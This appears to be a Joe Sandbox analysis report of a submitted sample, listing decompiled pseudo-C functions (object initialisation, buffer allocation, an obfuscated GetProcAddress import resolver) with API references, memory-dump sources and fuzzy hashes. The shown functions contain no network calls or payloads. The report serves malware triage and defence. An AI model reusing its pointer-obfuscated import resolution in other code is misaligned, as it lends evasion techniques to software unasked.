                                                    				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
                                                    				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
                                                    				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
                                                    				 *((char*)(_t89 + 0x6cd4)) = 0;
                                                    				 *((short*)(_t89 + 0x6cdc)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
                                                    				E00CDFFF0(_t87, _t89 + 0x2220, 0, 0x40);
                                                    				E00CDFFF0(_t87, _t89 + 0x2260, 0, 0x34);
                                                    				E00CDFFF0(_t87, _t89 + 0x45a8, 0, 0x20);
                                                    				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
                                                    				 *((short*)(_t89 + 0x6d12)) = 0;
                                                    				 *((char*)(_t89 + 0x6cee)) = 0;
                                                    				 *((char*)(_t89 + 0x6d10)) = 0;
                                                    				 *((char*)(_t89 + 0x21f8)) = 0;
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                                                    				return _t89;
                                                    			}













                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC13E1
                                                      • Part of subcall function 00CC5E37: __EH_prolog.LIBCMT ref: 00CC5E3C
                                                      • Part of subcall function 00CCCE40: __EH_prolog.LIBCMT ref: 00CCCE45
                                                      • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 7f95fa38065cb24d95740098f8bda9934368ae125d5814a097c1d6f6f98e737d
                                                    • Instruction ID: 20359fd918b34cc8f1ba067d66b3f68215b4e5623472c3c2e672620de31e77f4
                                                    • Opcode Fuzzy Hash: 7f95fa38065cb24d95740098f8bda9934368ae125d5814a097c1d6f6f98e737d
                                                    • Instruction Fuzzy Hash: F24156B0905B409EE724DF7AC885AE6FAE5BF19300F54492EE5FF83282CB316654DB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E00CC13DC(intOrPtr __ecx, void* __edi, void* __eflags) {
                                                    				signed int _t61;
                                                    				char _t63;
                                                    				intOrPtr _t73;
                                                    				char _t82;
                                                    				void* _t86;
                                                    				void* _t87;
                                                    				intOrPtr _t89;
                                                    				void* _t91;
                                                    				void* _t96;
                                                    
                                                    				_t96 = __eflags;
                                                    				_t87 = __edi;
                                                    				E00CDEB78(0xcf2635, _t91);
                                                    				_push(__ecx);
                                                    				_push(__ecx);
                                                    				_t89 = __ecx;
                                                    				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
                                                    				E00CC9556(__ecx);
                                                    				 *((intOrPtr*)(__ecx)) = 0xcf35f8;
                                                    				 *((intOrPtr*)(_t91 - 4)) = 0;
                                                    				E00CC5E37(__ecx + 0x1038, _t96);
                                                    				 *((char*)(_t91 - 4)) = 1;
                                                    				E00CCCE40(__ecx + 0x20f8, _t86, _t96);
                                                    				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
                                                    				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
                                                    				E00CC157A();
                                                    				_t61 = E00CC157A();
                                                    				_t82 =  *((intOrPtr*)(_t91 + 8));
                                                    				 *((char*)(_t91 - 4)) = 4;
                                                    				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
                                                    				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
                                                    				_t98 = _t82;
                                                    				if(_t82 != 0) {
                                                    					_t63 = _t82;
                                                    				} else {
                                                    					_push(0x92f0);
                                                    					_t73 = E00CDEB38(_t86, _t98);
                                                    					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
                                                    					 *((char*)(_t91 - 4)) = 5;
                                                    					if(_t73 == 0) {
                                                    						_t63 = 0;
                                                    					} else {
                                                    						_t63 = E00CCB505(_t73); // executed
                                                    					}
                                                    				}
                                                    				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
                                                    				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
                                                    				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
                                                    				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
                                                    				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
                                                    				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
                                                    				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
                                                    				 *((char*)(_t89 + 0x6cd4)) = 0;
                                                    				 *((short*)(_t89 + 0x6cdc)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
                                                    				E00CDFFF0(_t87, _t89 + 0x2220, 0, 0x40);
                                                    				E00CDFFF0(_t87, _t89 + 0x2260, 0, 0x34);
                                                    				E00CDFFF0(_t87, _t89 + 0x45a8, 0, 0x20);
                                                    				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
                                                    				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
                                                    				 *((short*)(_t89 + 0x6d12)) = 0;
                                                    				 *((char*)(_t89 + 0x6cee)) = 0;
                                                    				 *((char*)(_t89 + 0x6d10)) = 0;
                                                    				 *((char*)(_t89 + 0x21f8)) = 0;
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                                                    				return _t89;
                                                    			}













                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC13E1
                                                      • Part of subcall function 00CC5E37: __EH_prolog.LIBCMT ref: 00CC5E3C
                                                      • Part of subcall function 00CCCE40: __EH_prolog.LIBCMT ref: 00CCCE45
                                                      • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 67e73c95c534c8f75275de8ba4fa70ece157908bc1318c8caeb20d02f71685f7
                                                    • Instruction ID: ff2cb6316c78afa5243397c92b78ac1b1d71fce698e3cc7bb6e1349ed2df0e36
                                                    • Opcode Fuzzy Hash: 67e73c95c534c8f75275de8ba4fa70ece157908bc1318c8caeb20d02f71685f7
                                                    • Instruction Fuzzy Hash: 934136B0905B409AE724DF7A8885AE6FAE5BF19300F54492ED6FE83282CB316654DB11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 71%
                                                    			E00CD359E(void* __ecx, void* __edx) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* _t29;
                                                    				signed int* _t36;
                                                    				signed int _t38;
                                                    				intOrPtr _t39;
                                                    				intOrPtr _t42;
                                                    				signed int _t44;
                                                    				void* _t47;
                                                    				void* _t60;
                                                    				signed int _t65;
                                                    				void* _t67;
                                                    				void* _t69;
                                                    				void* _t73;
                                                    
                                                    				_t29 = E00CDEB78(0xcf2a92, _t67);
                                                    				_push(__ecx);
                                                    				_push(__ecx);
                                                    				_t60 = __ecx;
                                                    				_t44 = 0;
                                                    				_t72 =  *((intOrPtr*)(__ecx + 0x20));
                                                    				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
                                                    					_push(0x400400); // executed
                                                    					_t42 = E00CDEE53(__ecx, __edx, _t72); // executed
                                                    					 *((intOrPtr*)(__ecx + 0x20)) = _t42;
                                                    					_t29 = E00CDFFF0(__ecx, _t42, 0, 0x400400);
                                                    					_t69 = _t69 + 0x10;
                                                    				}
                                                    				_t73 =  *(_t60 + 0x18) - _t44;
                                                    				if(_t73 == 0) {
                                                    					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
                                                    					_t30 = _t65;
                                                    					 *(_t67 - 0x10) = _t65;
                                                    					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t65 * 0x00004ae4) + 0x00000004);
                                                    					_t36 = E00CDEE53(( ~(_t73 > 0) | _t65 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t73);
                                                    					_pop(0xd01098);
                                                    					 *(_t67 - 0x14) = _t36;
                                                    					 *(_t67 - 4) = _t44;
                                                    					_t74 = _t36;
                                                    					if(_t36 != 0) {
                                                    						_push(E00CD2360);
                                                    						_push(E00CD21C0);
                                                    						_push(_t65);
                                                    						_t16 =  &(_t36[1]); // 0x4
                                                    						_t44 = _t16;
                                                    						 *_t36 = _t65;
                                                    						_push(0x4ae4);
                                                    						_push(_t44);
                                                    						E00CDEC7B(_t44, _t60, _t65, _t74);
                                                    					}
                                                    					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
                                                    					 *(_t60 + 0x18) = _t44;
                                                    					_t29 = E00CDFFF0(_t60, _t44, 0, _t65 * 0x4ae4);
                                                    					if(_t65 != 0) {
                                                    						_t38 = 0;
                                                    						 *(_t67 - 0x10) = 0;
                                                    						do {
                                                    							_t47 =  *(_t60 + 0x18) + _t38;
                                                    							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
                                                    								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
                                                    								_t39 = E00CE3E33(0xd01098); // executed
                                                    								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
                                                    								0xd01098 = 0x30c00;
                                                    								if(_t39 == 0) {
                                                    									E00CC6CA7(0xd01098);
                                                    								}
                                                    								_t38 =  *(_t67 - 0x10);
                                                    							}
                                                    							_t38 = _t38 + 0x4ae4;
                                                    							 *(_t67 - 0x10) = _t38;
                                                    							_t65 = _t65 - 1;
                                                    						} while (_t65 != 0);
                                                    					}
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
                                                    				return _t29;
                                                    			}


                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: d857d6d37500158e0cd92d406c2b55ca4b181a8fc997971187ca97be419e0a77
                                                    • Instruction ID: 40b15dafa9dfb0a7300385588ef09e1c88b9685b98bf7feccbe67a5916628793
                                                    • Opcode Fuzzy Hash: d857d6d37500158e0cd92d406c2b55ca4b181a8fc997971187ca97be419e0a77
                                                    • Instruction Fuzzy Hash: D321E1B5E40251ABDB14AF75CC41A6BB7A8FB19714F04053FF716AB781D3B09A00C6A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E00CDB093(void* __ecx, void* __edx, void* __eflags) {
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				char _t39;
                                                    				char _t41;
                                                    				char _t60;
                                                    				char _t65;
                                                    				signed int _t70;
                                                    				void* _t72;
                                                    				intOrPtr _t74;
                                                    				void* _t77;
                                                    
                                                    				_t77 = __eflags;
                                                    				E00CDEB78(0xcf2ae8, _t72);
                                                    				_push(__ecx);
                                                    				E00CDEC50(0x7d2c);
                                                    				_push(_t70);
                                                    				_push(_t68);
                                                    				 *((intOrPtr*)(_t72 - 0x10)) = _t74;
                                                    				 *((intOrPtr*)(_t72 - 4)) = 0;
                                                    				E00CC13DC(_t72 - 0x7d3c, _t68, _t77, 0); // executed
                                                    				 *((char*)(_t72 - 4)) = 1;
                                                    				E00CC1FDC(_t72 - 0x7d3c, __edx, _t70, _t72, _t77,  *((intOrPtr*)(_t72 + 0xc)));
                                                    				if( *((intOrPtr*)(_t72 - 0x105f)) == 0) {
                                                    					 *((intOrPtr*)(_t72 - 0x24)) = 0;
                                                    					 *(_t72 - 0x20) = 0;
                                                    					 *((intOrPtr*)(_t72 - 0x1c)) = 0;
                                                    					 *((intOrPtr*)(_t72 - 0x18)) = 0;
                                                    					 *((char*)(_t72 - 0x14)) = 0;
                                                    					 *((char*)(_t72 - 4)) = 2;
                                                    					_push(_t72 - 0x24);
                                                    					_t59 = _t72 - 0x7d3c;
                                                    					_t39 = E00CC19AF(_t72 - 0x7d3c, __edx);
                                                    					__eflags = _t39;
                                                    					if(_t39 != 0) {
                                                    						_t70 =  *(_t72 - 0x20);
                                                    						_t68 = _t70 + _t70;
                                                    						_push(_t70 + _t70 + 2);
                                                    						_t65 = E00CE3E33(_t59);
                                                    						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x10)))) = _t65;
                                                    						__eflags = _t65;
                                                    						if(_t65 != 0) {
                                                    							__eflags = 0;
                                                    							 *((short*)(_t65 + _t70 * 2)) = 0;
                                                    							E00CE0320(_t65,  *((intOrPtr*)(_t72 - 0x24)), _t68);
                                                    						} else {
                                                    							_t70 = 0;
                                                    						}
                                                    						 *( *(_t72 + 0x14)) = _t70;
                                                    					}
                                                    					_t60 =  *((intOrPtr*)(_t72 - 0x24));
                                                    					 *((char*)(_t72 - 4)) = 3;
                                                    					__eflags = _t60;
                                                    					if(_t60 != 0) {
                                                    						__eflags =  *((char*)(_t72 - 0x14));
                                                    						if( *((char*)(_t72 - 0x14)) != 0) {
                                                    							__eflags =  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c));
                                                    							E00CCF445(_t60,  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c)));
                                                    							_t60 =  *((intOrPtr*)(_t72 - 0x24));
                                                    						}
                                                    						L00CE3E2E(_t60);
                                                    					}
                                                    					E00CC1692(_t72 - 0x7d3c, _t68, _t70); // executed
                                                    					_t41 = 1;
                                                    				} else {
                                                    					E00CC1692(_t72 - 0x7d3c, _t68, _t70);
                                                    					_t41 = 0;
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
                                                    				return _t41;
                                                    			}


                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CDB098
                                                      • Part of subcall function 00CC13DC: __EH_prolog.LIBCMT ref: 00CC13E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 0ef9af323c62dfdf9b1c5bb8413c8c88db05bef3ee2a574a45feed9ac2af5a54
                                                    • Instruction ID: 2ca2c5d52b57cf19085acfd6246cc057251f35ddba1e1eb703ce2348f369487b
                                                    • Opcode Fuzzy Hash: 0ef9af323c62dfdf9b1c5bb8413c8c88db05bef3ee2a574a45feed9ac2af5a54
                                                    • Instruction Fuzzy Hash: C8316A75810249EACF15EFA6C851AEEBBB4AF09304F14449EE809B7242D735AF04DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 90%
                                                    			E00CEAC98(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                    				struct HINSTANCE__* _t13;
                                                    				signed int* _t20;
                                                    				signed int _t27;
                                                    				signed int _t28;
                                                    				signed int _t29;
                                                    				signed int _t33;
                                                    				intOrPtr* _t34;
                                                    
                                                    				_t20 = 0xd22628 + _a4 * 4;
                                                    				_t27 =  *0xcfe7ac; // 0x349e4b74
                                                    				_t29 = _t28 | 0xffffffff;
                                                    				_t33 = _t27 ^  *_t20;
                                                    				asm("ror esi, cl");
                                                    				if(_t33 == _t29) {
                                                    					L14:
                                                    					return 0;
                                                    				}
                                                    				if(_t33 == 0) {
                                                    					_t34 = _a12;
                                                    					if(_t34 == _a16) {
                                                    						L7:
                                                    						_t13 = 0;
                                                    						L8:
                                                    						if(_t13 == 0) {
                                                    							L13:
                                                    							_push(0x20);
                                                    							asm("ror edi, cl");
                                                    							 *_t20 = _t29 ^ _t27;
                                                    							goto L14;
                                                    						}
                                                    						_t33 = GetProcAddress(_t13, _a8);
                                                    						if(_t33 == 0) {
                                                    							_t27 =  *0xcfe7ac; // 0x349e4b74
                                                    							goto L13;
                                                    						}
                                                    						 *_t20 = E00CE7CA3(_t33);
                                                    						goto L2;
                                                    					} else {
                                                    						goto L4;
                                                    					}
                                                    					while(1) {
                                                    						L4:
                                                    						_t13 = E00CEAD34( *_t34); // executed
                                                    						if(_t13 != 0) {
                                                    							break;
                                                    						}
                                                    						_t34 = _t34 + 4;
                                                    						if(_t34 != _a16) {
                                                    							continue;
                                                    						}
                                                    						_t27 =  *0xcfe7ac; // 0x349e4b74
                                                    						goto L7;
                                                    					}
                                                    					_t27 =  *0xcfe7ac; // 0x349e4b74
                                                    					goto L8;
                                                    				}
                                                    				L2:
                                                    				return _t33;
                                                    			}











                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00CEACF8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: 43af63536b91818c2b5aee8d3db4dc6179f403e96b6d50d976dd545e5078ed0e
                                                    • Instruction ID: 7824f002ddf0c2e71f09eec35e9ec191c81d99eda7c2d86d0247025a063c3941
                                                    • Opcode Fuzzy Hash: 43af63536b91818c2b5aee8d3db4dc6179f403e96b6d50d976dd545e5078ed0e
                                                    • Instruction Fuzzy Hash: 31110633A002756F9B269E2FEC40A6A7395AB847607264221FC25EB264D731FE01C7D3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E00CDDA52(void* __ecx, void* __edx, void* __eflags) {
                                                    				void* __ebx;
                                                    				intOrPtr _t19;
                                                    				char _t20;
                                                    				char _t21;
                                                    				void* _t24;
                                                    				void* _t25;
                                                    				void* _t38;
                                                    				void* _t44;
                                                    				intOrPtr _t46;
                                                    
                                                    				_t38 = __edx;
                                                    				E00CDEB78(0xcf2b3c, _t44);
                                                    				_push(__ecx);
                                                    				E00CDEC50(0x2108);
                                                    				_push(_t25);
                                                    				 *((intOrPtr*)(_t44 - 0x10)) = _t46;
                                                    				E00CE6066(0xd15872, "X");
                                                    				E00CD0659(0xd17894, _t38, 0xcf35f0);
                                                    				E00CE6066(0xd16892,  *((intOrPtr*)(_t44 + 0xc)));
                                                    				E00CC5B3D(0xd0c578, _t38,  *((intOrPtr*)(_t44 + 0xc)));
                                                    				_t4 = _t44 - 4;
                                                    				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                    				_t19 = 2;
                                                    				 *0xd14850 = _t19;
                                                    				 *0xd1484c = _t19;
                                                    				 *0xd14848 = _t19;
                                                    				_t20 =  *0xd08461; // 0x0
                                                    				 *0xd136d3 = _t20;
                                                    				_t21 =  *0xd08462; // 0x1
                                                    				_push(0xd0c578);
                                                    				 *0xd1370c = 1;
                                                    				 *0xd1370f = 1;
                                                    				 *0xd136d4 = _t21;
                                                    				E00CC7B0D(_t44 - 0x2118, _t38,  *_t4);
                                                    				 *(_t44 - 4) = 1;
                                                    				E00CC7C7D(_t44 - 0x2118, _t38,  *_t4);
                                                    				_t24 = E00CC7B9E(_t25, _t44 - 0x2118); // executed
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
                                                    				return _t24;
                                                    			}













                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CDDA57
                                                      • Part of subcall function 00CD0659: _wcslen.LIBCMT ref: 00CD066F
                                                      • Part of subcall function 00CC7B0D: __EH_prolog.LIBCMT ref: 00CC7B12
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$_wcslen
                                                    • String ID:
                                                    • API String ID: 2838827086-0
                                                    • Opcode ID: 4eb017e650bf76210ba4a64dc70bf37996d54f58d4283742e58122ad2470b5c7
                                                    • Instruction ID: 0eab2f05e8b28fb3696aeb40fe79722b5c8234f377c2acfb94f23a170c5a3d4d
                                                    • Opcode Fuzzy Hash: 4eb017e650bf76210ba4a64dc70bf37996d54f58d4283742e58122ad2470b5c7
                                                    • Instruction Fuzzy Hash: 5B110175508384BED710ABA8E806BDC3FA0DB25310F00809EF24596392CFB05A45EB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 55%
                                                    			E00CC9215(void* __ebx, void* __edi, void* __eflags) {
                                                    				void* _t21;
                                                    				intOrPtr _t27;
                                                    				intOrPtr _t36;
                                                    				void* _t38;
                                                    				intOrPtr _t39;
                                                    				void* _t41;
                                                    				void* _t48;
                                                    
                                                    				E00CDEB78(0xcf2895, _t41);
                                                    				E00CC13BA(_t41 - 0x20, E00CC7C64());
                                                    				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                    				_t39 = E00CCD114( *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 - 0x20)),  *((intOrPtr*)(_t41 - 0x1c)), _t38);
                                                    				if(_t39 > 0) {
                                                    					_t27 =  *((intOrPtr*)(_t41 + 0x10));
                                                    					_t36 =  *((intOrPtr*)(_t41 + 0xc));
                                                    					do {
                                                    						_t48 = 0 - _t27;
                                                    						if(_t48 > 0 || _t48 >= 0 && _t39 >= _t36) {
                                                    							_t39 = _t36;
                                                    						}
                                                    						if(_t39 > 0) {
                                                    							E00CCD300( *((intOrPtr*)(_t41 + 8)), _t41,  *((intOrPtr*)(_t41 - 0x20)), _t39);
                                                    							asm("cdq");
                                                    							_t36 = _t36 - _t39;
                                                    							asm("sbb ebx, edx");
                                                    						}
                                                    						_push( *((intOrPtr*)(_t41 - 0x1c)));
                                                    						_push( *((intOrPtr*)(_t41 - 0x20)));
                                                    						_t39 = E00CCD114( *((intOrPtr*)(_t41 + 8)));
                                                    					} while (_t39 > 0);
                                                    				}
                                                    				_t21 = E00CC15FB(_t41 - 0x20); // executed
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                                                    				return _t21;
                                                    			}











                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
